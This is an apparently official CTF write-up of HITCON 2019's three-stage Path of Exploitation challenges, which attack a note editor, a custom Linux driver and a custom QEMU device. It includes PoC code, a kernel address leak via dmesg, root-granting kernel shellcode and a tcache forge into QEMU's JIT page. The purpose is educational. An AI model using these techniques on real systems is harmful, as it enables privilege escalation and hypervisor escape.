2019年10月23日 星期三

[Official Write-up] HITCON CTF Quals 2019 - Path of Exploitation

Path of Exploitation (PoE) are the pwn challenges I designed for this year's HITCON CTF qualification. It contains three stages/layers, hackers have to exploit a user-space program, do privilege escalation on Linux, and attack the custom device embedded in QEMU. Solve all three stages to be the master of pwn!

This challenge has a similar hierarchy as "Abyss" has, which is also my series of challenges in HITCON CTF 2018. Abyss contains three layers as well, the user-space program, the kernel, and the hypervisor, but with the self-implemented kernel and hypervisor based on KVM.

For PoE, I modified the latest QEMU source code to add a custom device, Treap Processing Unit (TPU), developed a Linux kernel module to drive my fancy device, and a simple note editor in user-space that utilize TPU to perform string operations.
I have released all the source code and my exploit scripts  for this challenge, along with the patch needed for Linux kernel and QEMU.

Inspiration
All Linux kernel challenges in CTFs I have ever seen simply add a buggy kernel module and ask hackers to gain root privilege. I always feel this design just moves the easy-to-exploit bug from user-space to Linux kernel and not interesting at all (Well some kernel exploitations are related to race-condition, but I hate race-condition bugs 😛). Therefore, I decided to design a series of challenges that include a kernel driver to communicate with "real" hardware.

For now, the concept of three layers of exploitation is formed, exploit the kernel driver to gain root permission, and before that, I can have a normal pwn challenge in user-space as usual, then with root privilege should be able to exploit the hardware simulator - QEMU in this case.

Now the question is, what kind of hardware should I implement? Every function can be implemented as hardware, but I need to choose one that could make both the driver and the user-space have "something" to do. If the hardware does all the important things, the driver has nothing to do, and neither does the user-space program, this will make me hard to put vulnerabilities inside them.

Treap as hardware is my final choice. Treap is a powerful binary search tree that could be used for performing sequence operations in O(logN) time, where N is the length of the sequence. AFAIK Treap has almost the same ability as Splay Tree has, but much easier to be understood and implemented. With Treap as the device, I can have the driver to implement a "data structure" (I name it as "cord") that supports sequence operations. And in the user-space program, it can create multiple "cords" (strings) as a normal text editor usually does.

The Names

TPU, a.k.a. Treap Processing Unit - inspired by the Google Tensor Processing Unit.

Cord the kernel driver - you must know there is a data structure in C++ named string, and you may know there is a powerful data structure named rope supported in libstdc++, which has all member methods as string has but implemented in O(logN) time. I'm not 100% sure what is the backend of rope uses, but it's likely to be based on Splay Tree I mentioned above. Then I searched for "the synonym of string and rope", and got cord as a great choice.

Luna the user-space editor - well... I have to admit this name is chosen just because Luna sounds like a pretty and mysterious girl's name. Then I looked up the dictionary for words that could spell LUNA out, and the result is shown in the welcome message when open "luna" - Legendary Ultra Note Accelerator.

And the overall name of these challenges, PoE, inspired by the online game Path of Exile. The three stages of challenges, getting deeper and harder when analyzing, feels like a path of exploitation.

PoE I - Luna
Now let's introduce the challenges. Luna is the first stage of these challenges, it's a classic menu-based program:
Luna is a note editor that supports basic operations like insertion and deletion, interesting operations like replacement and reversing. All the operations are performed with a range in a note, e.g. you can reverse range [3, 5] of a note with the length equal or greater than 6 with command R 3 2. And an important thing is you can new and switch the tab to select which note you would like to work on through commands n and s <N>.

Interact with /dev/cord
Though it's not related to exploiting Luna, I simply explain how the user-space program interacts with cord here, which helps readers to know my design concept.

First of all, the program opens "/dev/cord" to acquire a cord_fd.
int cord_fd = open("/dev/cord", O_RDWR);
If you execute luna on a normal Linux distribution, you will find the program fails on this very step since there is, of course, no "/dev/cord" exist. The file is registered by my kernel module, so you can't execute luna unless under the provided QEMU environment.

Then all operations are achieved via ioctl on the file descriptor cord_fd. For example, this snippet creates a new "cord" from data text with length n:
int new_data(int n, char text[]) {
  struct cord_new_data cmd = {
    .n = n,
    .data = text,
  };
  return ioctl(cord_fd, CORD_NEW_DATA, &cmd);
}
The ioctl call of CORD_NEW_DATA returns a cid (Cord ID) on success, which can be used as an argument for further operations. You can find all the supported ioctl calls and the argument structures of cord from linux/include/uapi/linux/cord.h.

Cache
Almost every operation shown in the menu is simply redirected to one or more ioctl calls in luna. However, there is a simple "cache" mechanism that aims to reduce the number of ioctl(CORD_DISPLAY) calls. When a new note is created, the text of the note is cached and, if the note's length isn't changed by operations such as insertion or cut, the text of the note is kept and can be used to display the content of note without invoking ioctl(CORD_DISPLAY).
void display(u32 idx, u32 n) {
  struct Tab *tab = tabs[cur_tab];

  if (!tab->dirty) {
    write(1, tab->cache + idx, n);
    puts("");
    return;
  }
  // ... display using ioctl
}
And this additional cache mechanism is the bug.

Buggy Luna
There's a README.md In the challenge attachment (you can find it here) and the first tip of Luna is
Analyze the binary luna should be enough for solving this challenge.
I thought this challenge was pretty easy since the tip is a big hint that you don't need to care about any ioctl calls in luna, and it's clear that only the cache mechanism can have bugs.

Anyway, the bug is here:
void cut(u32 idx, u32 n) {
  // .. omit
  struct cord_cut cmd = {
    .cid = tab->cid,
    .cur = idx,
    .len = n
  };
  clip->cid = ioctl(cord_fd, CORD_CUT, &cmd);
  clip->len = n; // bug: should call clip->remove_cache() here
  tab->len -= n;
  tab->remove_cache();
}
If we partially cut a note, clip's, which is a special note for cut/paste operations, cache is NOT updated. To fix the bug, just insert this line:
clip->remove_cache();
To leverage this bug, we can have clip cache something first, and cut a note with length longer than the cached one, then we can have OOB read via command display and OOB write via command replace.

Use the OOB write we can forge another note's cache and dirty fields, then we successfully convert OOB read/write to arbitrary read/write.

Remain is nothing special, use ROP to pop a shell and get the first flag:
PoE II - Cord
Now let's dig into the kernel driver. The target is to gain root privilege and read /flag2.
An important thing is to check the protection enabled in the kernel, see run.sh provided in the challenge attachment:
#!/bin/bash

./x86_64-softmmu/qemu-system-x86_64 \
  -kernel ./bzImage \
  -initrd ./initramfs.cpio.gz \
  -nographic \
  -monitor none \
  -cpu qemu64 \
  -append "console=ttyS0 kaslr panic=1" \
  -device tpu \
  -m 256M
I enabled the kernel ASLR and reboot on kernel panic. A good news to challengers is I didn't enable SMAP (which can be done through -cpu qemu64,smap) because I want this challenge to be easier. SMAP is a CPU feature that prevents instructions in user-space being executed under supervisor mode.
IIUC (not sure if this still works under the latest kernel) SMAP can be disabled if we can do ROP in kernel space, and my exploitation does have ROP in kernel space, but I didn't try the SMAP disable payload because I've already decided to make this challenge.. easy.

The Cord
linux/drivers/misc/tpu/ contains all the source code for this kernel driver. I realize the reversing engineering is a little tough if one hasn't implemented a PCI device driver. But well, as I mentioned in the second section, a kernel driver without communicating with hardware is just a toy.
This image shows the flow when an ioctl call occurs:

The identifier between user-space and the kernel driver is Cord ID (cid), and the identifier between the kernel and TPU is Treap ID (tid). There's a table named cid_map to maintain the mappings between cid and tid. Why we need two kinds of ID? Not because I want to make it complicated (I always want it to be easy), there's a reason. Imagine the user-space program holds a cid and, for example, does a cut operation on the cord, it's intuitive to the user that cid stands for the same string (with a range be cut off). But in the kernel's view, the cut operation separated the sequence into two sequences, each with a new Treap ID (A Treap stands for a sequence). So instead of passing the frequent changing tid to user-space, the kernel only needs to update cid_map[cid] to the new Treap ID and the user can happily use cid to represent the "same" sequence.

tpu-interp.c implements the functions for converting a high-level command to TPU instructions. Take the cut operation as an example:
// modified tpu-interp.c#tpu_cut
int tpu_cut(struct tpu_device *tdev, int tid, uint cur, uint len,
            int *out_tid1, int *out_tid2)
{
        /* omit the preparation */

        command_load(TPU_R0, tid); // R0 = Treap(tid)
        command_split(TPU_R0, cur, TPU_R0, TPU_R1); // Split R0 into R0 and R1
        command_split(TPU_R1, len, TPU_R1, TPU_R2); // Split R1 into R1 and R2
        command_merge(TPU_R0, TPU_R0, TPU_R2); // R0 = Merge R0 and R2
        command_info(TPU_R0); // query the tid of R0
        command_info(TPU_R1); // query the tid of R1

        /* omit the commitment */
}
TPU_R* are registers for the instructions between the kernel and TPU, you can treat them as pointers to a Treap structure (which is right the way TPU implements).
To cut the range from cur with length len of tid, first we need to split.. well it's a little hard to explain, let the image tell everything:

Combine the image with the code above, it should be easy to understand how the driver converts high-level commands to TPU instructions. You don't need to know (at least for this stage) what split and merge does, they are magic functions implemented in the hardware.

Queues
Another important part is a command queue and a response queue is used for the communication between the kernel and TPU. The TPU instructions generated in tpu-interp.c are put on the cmd queue, and the responses (if any) from the TPU are put on the rsp queue.

The concept of using queues for communication is inspired by SMMUv3. For some reason, I read the specification of SMMUv3 recently and found there are a lot of interesting designs. There is a command queue for the host to send commands to SMMU, and an event queue for SMMU to push errors when something goes wrong. And the idea that uses a wrap bit to distinguish a circular queue is full or empty also comes from SMMU (3.5.1 SMMU circular queues). I don't know if these design tricks are "invented" by ARM or common design patterns in hardware. I guess the answer is the latter one.

Data Width
Before revealing where the bug is, the data width mechanism in TPU is important to be introduced first.

In Luna, if you have analyzed or checked the source luna.c, you can find there is an ioctl call right after opening the device file:
ioctl(cord_fd, CORD_SET_DATA_WIDTH, 1);

The data width is used for the length of data recorded on each treap node. In luna, each note is a string, and each "element" in a string is a one-byte character. So the data width used in luna is 1, as the argument passed to ioctl. But the "elements" of a string need not be characters, you can use integers with data width equals 4, or pointers with 8. This is inspired by the fact that std::string is a typedef of std::basic_string<char>. You can use std::basic_string<int> or std::basic_string<void*> to declare "strings" with 4-byte or 8-byte elements.

Buggy Cord
The bug is much harder for teams to find than I expected. According to the IRC and the log on the challenge service, only one team was "closed" to where the bug was - but that was not enough to defeat my cord.

The bug is, the kernel driver records data width in the wrong way. The data width in TPU's side is a treap-wide attribute, different treaps in TPU can have different width, while in the driver's side, width is a global-wide attribute. The kernel should also record the width per treap but not globally. You may feel this is the inconsistent implementation details between the kernel and TPU, and one can never find this bug without analyzing both the driver and the patched QEMU. But I would say yes they can. I expected the bug can be "detected" by checking these two functions:
// tpu-cord.c
int tpu_cord_new_data(struct tpu_cord *cord, struct cord_new_data __user *argp)
{
        // .. omit
        tid = tpu_new_tree(cord->tdev, cmd.n, cord->data_width, d);
        // .. omit
}
int tpu_cord_display(struct tpu_cord *cord, struct cord_display __user *argp)
{
        // .. omit
        ret = tpu_display(cord->tdev, tid, cmd.cur, cmd.len, cord->data_width, data);
        // .. omit
}
When the kernel needs to create a new treap, cord->data_width is passed to TPU. And when the kernel wants to fetch the data recorded in a treap, cord->data_width is used again. So what will happen if we change cord->data_width after creating a cord, and before displaying it? When this question comes to your mind, it's not hard to find the answer - the response queue will be corrupted.

PoC
unsigned char data[24] = {
  0, 0, 0, // dummy
  TPU_OP_PRINT, 1, 0
};
set_width(8); // ioctl(cord_fd, CORD_SET_DATA_WIDTH, 8)
int cid = new_data(3, data);
set_width(1);
display(cid, 0, 3, data); // <--- the kernel thinks width=1 but TPU knows it's 8
new_data(1, data); // whatever you do here, the kernel will crash
When the kernel asks TPU to display cid, TPU responses all 3 * 8 = 24 bytes data onto the response queue. While the kernel, which is "cheated" by us, will fetch only 3 * 1 = 3 bytes data from the response queue. And the remaining data on the response queue will be interpreted on the next time the kernel trying to consume the queue. In the PoC, the fourth byte is TPU_OP_PRINT on the response queue, which leads to the handler of PRINT be called and a null-pointer dereference will be triggered:
// tpu-interp.c
static int tpu_print_handle(struct tpu_device *tdev, void *arg_)
{
        struct tpu_print_args *arg = arg_; // <-- this is null
        uint sz = 0;

        if (!fetch_rsp(tdev, 1, (u8 *)&sz))
                return -EBADMSG;
        if (!fetch_rsp(tdev, sz * arg->width, arg->data)) // panic
                return -EBADMSG;
        return 0;
}
In a normal situation, arg will be well prepared and of course, no error occurs. But I put the "fake" TPU_OP_PRINT on the queue, this handler will be called without a proper arg, and then crash the kernel.

Exploitation
Finally, we can start our favorite part.
First of all, we need to know how powerful we are when the content of the response queue is fully controlled. There are only three kinds of handler might be called, they are TPU_OP_VERSION, TPU_OP_INFO, and TPU_OP_PRINT.
// tpu-interp.c
/* fetch op and call the handler */
int tpu_rsp_handle(struct tpu_device *tdev, void *arg)
{
        enum TPU_OP op = TPU_OP_END;

        if (!fetch_rsp(tdev, 1, (u8 *)&op))
                return -EBADMSG;
        switch (op) {
        case TPU_OP_VERSION:
                return tpu_hw_version_handle(tdev);
        case TPU_OP_PRINT:
                return tpu_print_handle(tdev, arg);
        case TPU_OP_INFO:
                return tpu_info_handle(tdev);
        default:
                return -EBADMSG;
        };
}
VERSION is a dumb thing, just ignore it. INFO is used for returning the Treap ID (tid) to the driver, so we can cheat the kernel about tid values to whatever we want, and this is useful.
See this function for handling a cut operation:
// tpu-cord.c
static int tpu_cord_cut(struct tpu_cord *cord, struct cord_cut __user *argp)
{
        // .. omit
        ret = tpu_cut(cord->tdev, tid, cmd.cur, cmd.len, &tid, &tid2);
        if (WARN_ON(ret < 0)) // should never happen.. unless the rsp queue is corrupted
                goto out;
        // .. omit
out:
        tpu_cord_set_map(cord, cmd.cid, 0, 0);
        return ret;
}
Notice that WARN_ON, if tpu_cut returns a negative errno, WARN_ON will dump the stack trace and all register values to dmesg. It looks like:
Which contains a lot of kernel addresses, and the most important thing is, it just a WARNING, not PANIC, the kernel will keep executing as nothing wrong happened!
So we can use this to leak kernel addresses without corrupting any kernel memory. This is how I uses WARN_ON to leak stack address:
// sol/cord_exp.c#leak
cut(cid, 2, 1); // trigger WARN_ON
system("dmesg | grep 'RSP: 0018:' > /home/poe/z");
FILE *f = fopen("/home/poe/z", "r");
fscanf(f, "[ %f] RSP: 0018:%llx", &dummy, &k_stack);
printf("kernel stack @ %#llx\n", k_stack);

Leaking kernel addresses is all we can do with the handler of INFO, now let's move to the one of PRINT:
// tpu-interp.c
static int tpu_print_handle(struct tpu_device *tdev, void *arg_)
{
        struct tpu_print_args *arg = arg_;
        uint sz = 0;

        if (!fetch_rsp(tdev, 1, (u8 *)&sz)) // sz comes from the queue!
                return -EBADMSG;
        if (!fetch_rsp(tdev, sz * arg->width, arg->data))
                return -EBADMSG;
        return 0;
}
How much data will be written into arg->data is decided by sz, which is read from the response queue(!). So obviously we have a kernel heap overflow here.

With addresses leaked and a nice heap overflow, nothing can stop we hackers. The way I control rip is using the heap overflow to overwrite arg of PRINT:
// tpu-interp.c
static int tpu_print_handle(struct tpu_device *tdev, void *arg_)           
        // ^--- control this value
{
        struct tpu_print_args *arg = arg_;
        uint sz = 0;

        if (!fetch_rsp(tdev, 1, (u8 *)&sz))
                return -EBADMSG;
        if (!fetch_rsp(tdev, sz * arg->width, arg->data)) // then we have the world
                return -EBADMSG;
        return 0;
}
Carefully control arg's width and data we can have arbitrary write in the kernel. In my solution, I simply write 8 bytes to a return address on the kernel stack and return to the prepared shellcode on user-space, it can't be easier.

This is the shellcode I prepared:
sc = asm(<<-EOS)
  push rax /* store regs */
  push rbp
  mov rax, 0x5ac8
  mov rbp, QWORD PTR gs:[rax]
  and rbp, 0xfffffffffff00000
  mov rdx, rbp
  add rdx, 0xb6080 /* prepare_kernel_cred */
  xor rdi, rdi
  call rdx
  mov rdi, rax
  mov rdx, rbp
  add rdx, 0xb5da0 /* commit_creds */
  call rdx
  pop rbp
  pop rax
  mov rdx, QWORD PTR [rsp + 0x40]
  and rdx, 0xfffffffffff00000
  add rdx, 0xb7389 /* org ret */
  push rdx
  ret
EOS
It first leaks the code base address through register gs, calls our friends commit_creds(prepare_kernel_cred(0)), and fixes the original return address so we can easily return from the system call as no weird thing happened - and with root permission.

My exploit script has approximately a quarter success rate because the heap layout is not stable. I overflow 0x500 bytes and wish the target structure (handler's arg) is near enough to be overwritten. It's possible to overflow more bytes and make the rate higher, but this one is good enough for me.

PoE III - TPU
Finally comes the final stage and, unfortunately, this is the hardest (in my opinion) challenge in this series.

First of all, to exploit TPU you need to learn how a Treap works. Check the Wiki page might be enough. The most important part is the merge and split (named union in Wiki), here's my implementation:
// qemu/hw/misc/tpu.c
static Node *merge(Node *a, Node *b) {
        if (a == NULL) return b;
        if (b == NULL) return a;
        if (a->hval >= b->hval) {
                push(a);
                a->r = merge(a->r, b);
                pull(a);
                return a;
        }
        else {
                push(b);
                b->l = merge(a, b->l);
                pull(b);
                return b;
        }
}

static void split(Node *now, uint32_t x, Node **a, Node **b) {
        int lsz;

        if (x == 0) {
                *a = NULL;
                *b = now;
                return;
        }
        if (now == NULL || now->sz == x) {
                *a = now;
                *b = NULL;
                return;
        }

        push(now);

        if (now->l) lsz = now->l->sz;
        else lsz = 0;

        if(lsz + 1 <= x) {
                *a = now;
                split(now->r, x - lsz - 1, &((*a)->r), b);
        }
        else {
                *b = now;
                split(now->l, x, a, &((*b)->l));
        }
        pull(now);
}

Bug
Oh, this fast? Nothing to introduce first? Well, there might be some interesting things that should be mentioned, such as the timing of malloc/free (yap, we are going to do heap exploitation), but we don't need any of them to describe the bug.

The bug occurs when the device handling the command MERGE comes from the kernel:
static void handle_cmd_merge(TPUState *tpu, cmd_type inst)
{
        uint8_t d, s1, s2;

        // omit some checks
        if (null_or_root(tpu->reg[s1]) && null_or_root(tpu->reg[s2])) {
                unset_tid(tpu->reg[s1]);
                unset_tid(tpu->reg[s2]);
                tpu->reg[d] = merge(tpu->reg[s1], tpu->reg[s2]);
                set_tid(tpu->reg[d]);
        }
        else {
                tpu->reg[d] = NULL;
        }
}
set_tid and unset_tid are used for marking a Node* is the root of a treap or not, they are fine, bug-free. The bug is here: merge(tpu->reg[s1], tpu->reg[s2]). merge is going to merge two treaps into one treap. So, what will happen if we merge the same treap? The answer is, we will obtain a treap with the root's right child is itself.


Brainstorming
I have to say this bug is so beautiful because - it's not intended. Actually, I didn't prepare any intended bug when I wrote the code. I found this bug when I did the self code auditing, and at first I thought this bug was unexploitable. If we print the "loop-ed" treap, it definitely causes an infinite recursion and crashes QEMU (we have no interest in DoS bugs). And if we do other operations such as split the treap, it will go back to a normal treap.

Then I keep thinking if other operations will have fun effects on a loop-ed treap and realize I already know the one - merge.
To be easier to describe, all the "loop-ed treap" below stands for a treap with only one node, its left child points to null and right child points to itself.
Say we have a loop-ed treap A. We can't merge it with itself again otherwise an infinite recursion would happen. But we can merge it with another loop-ed treap B. And the most interesting part is the size attribute within these treaps.

Make it more general. Say we have a loop-ed treap A with size a and a loop-ed treap B with size b, B's heap_value is larger than A's heap_value. Then do the following operations:
  1. merge(A, B) => size(A) = a; size(B) = a + b + 1
  2. split(B, a) => size(A) = a; size(B) = a + b + 2
So two operations could make the loop-ed treap B's size grow a + 2. And if we let B merge another loop-ed treap C, we could make C's size grow a + b + 4. You may have already noticed that we can make the size of a loop-ed treaps grow exponentially. And eventually we will have an integer overflow on the size attribute.

In my solution sol/tpu_exp.c#construct_3 is used for constructing a loop-ed treap with size equals -3. I need such treap because it can be used as A, and when we merge it with another loop-ed treap B, B's size will be changed from b to b-3+2 = b-1. So we can create loop-ed treaps with arbitrary negative size based on the "-3" treap.

Exploitation
So what's the benefit of having a treap with negative size? Obviously a possible way to leverage this bug is we can have the size of the buffer needed for printing the treap wrong:
// src/qemu/hw/misc/tpu.c
static void handle_cmd_print(TPUState *tpu, cmd_type inst)
{
        Node *n = tpu->reg[(inst >> 4) & (TPU_REG_END - 1)];
        uint8_t op = TPU_OP_PRINT;
        int sz;
        void *data;

        push_rsp(tpu, &op, 1);
        if (!is_root(n) || n->sz > MAX_CMD_N) {
                // .. omit
        }
        else {
                data = g_malloc(n->sz * n->w); // n->sz can be any value we want
                sz = 0;
                print_tree(n, data, &sz);
                push_rsp(tpu, (uint8_t *)&n->sz, 1);
                push_rsp(tpu, data, n->sz * n->w);
                g_free(data);
        }
}
However, we still cannot print a loop-ed treap because it's... loop-ed. When you trying to traverse a loop-ed treap, it must trap into the infinite loop and will crash eventually. But there's a way to overcome this - the heap overflow. If we let the buffer for printing locate right before the Node* structure of the loop-ed node on the heap, then the heap overflow when printing data will overwrite the right child of that loop-ed node, and therefore break the loop. This is the key point in my exploitation, which successfully converts a DoS vulnerability to a heap exploitation.


Since we don't have any addresses leaked, a good practice is to overwrite the low bytes of the pointer of the right child to change the loop-ed treap into a normal treap but with right child points to a fake node we prepared. Let the fake node overlap with another node structure then we can leak the heap address. BTW, the heap address we are working on is a threaded heap since the TPU device works in a separate thread.

The good news is there are JIT pages used in QEMU, which is an rwx segment. And even better, on the Ubuntu 18.04 machine, the JIT page is 0x20000000 bytes away from our heap address. The distance between the JIT page and our heap is not always 0x20000000 but I found it's highly to be. I guess the instability is related to the order of mmap calls invoked by threads in QEMU.

After leaked the heap address, I forged the tcache entry to make the next chunk to be malloc-ed locate in the JIT page and boom! Overwrite the content of the JIT page with shellcode to cat the flag.
There are some details needed to be careful when exploiting such as how to forge a fake node without crashing the program and how to prevent threads crashed before JIT code being executed, but I will not explain them here since that will be too annoying.

The screenshot when my exploit script succeed:

Fun Facts
I always like to share some fun facts after designed a challenge:
  1. My expected number of teams to solve PoE I, II, and III are 80, 10, and 2, respectively. And the result is 20, 0, and 0, with the error rate 300% and .
    • I have to say I'm pretty sad that no teams could even get into the final stage, maybe because the driver does too many things and it's hard to figure out where the bug is.
  2. There is one team that had a pretty close solution for PoE II during the competition. They were trying to use race-condition to change the data width before the IRQ handler is called.
    • How I wish I could tell them just remove that "race-condition" term from their brain and everything would work fine. I think the method they tried is impossible to be successful unless there are bugs in the driver I don't know (well this is surely possible).
  3. According to my commit history, this challenge took me a month to design, develop, and exploit. I learned a lot from developing programs in different layers (user-space, the kernel, and QEMU). Maybe this challenge can be modified to a demo for how-to-implement-your-qemu-device-plus-kernel-drivers? Please encourage me to do so if you think it's a good idea.
Conclusion
The path of exploitation is too long to have a brief conclusion :p
Wish you learned something from my challenge(s), and please DM @david942j on Twitter or leave comments here if you have any thoughts would like to share with me 😀

4 則留言:

  1. Is there any good tutorials on writing linux kernel module that you would recommend? I started doing some simple character device driver but it's hard to find detailed and up to date documentations on it.

    回覆刪除
    回覆
    1. Nope I don't know a nice tutorials for this. I only reviewed some drivers in Linux upstream and the official document.

      刪除
  2. How do you debug luna binary? QEMU didn't contain any debugging tools or python script. I tried uploading a standalone gdb but it was not executable. I also tried uploading kernel module in host linux to register /dev/cord but that didn't work either.

    回覆刪除
    回覆
    1. Pass argument "-gdb tcp::1234" to QEMU then you can attach GDB with "target remote localhost:1234" in GDB prompt, this is the normal way to debug a kernel running in QEMU.
      Add a statically-linked GDB to the filesystem should work, but I didn't try it.
      Executing insmod tpu.ko in your host didn't work because the kernel module could't find my fancy hardware TPU, which only added in the QEMU I provided.

      刪除